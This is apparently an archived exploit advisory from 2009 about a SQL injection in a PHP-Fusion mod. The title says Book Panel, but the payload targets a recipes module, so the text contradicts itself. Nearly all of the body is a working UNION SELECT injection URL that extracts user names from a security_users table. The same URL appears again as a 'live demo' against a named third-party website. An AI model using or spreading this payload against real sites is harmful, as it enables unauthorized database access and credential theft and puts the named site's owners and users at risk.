PHP-Fusion Book Panel SQL Injection

2009-03-10T00:00:00
ID PACKETSTORM:75602
Type packetstorm
Reporter SuB-ZeRo
Modified 2009-03-10T00:00:00

Description

                                        
                                            `++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
exploit :  
http://www.milw0rm.com/exploits/8182  
home : http://www.security-dz.com / soon mirror attack for sub-z3ro  
contacte : FbH@hotmail.com  
exploited by: SuB-ZeRo  
Greetings: x.CJP.x & AnGeL25Dz  
-------------------------------------------------------------------------------------------------------------------------------------  
Exploit:  
  
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--  
  
live demo :  
http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--  
  
  
`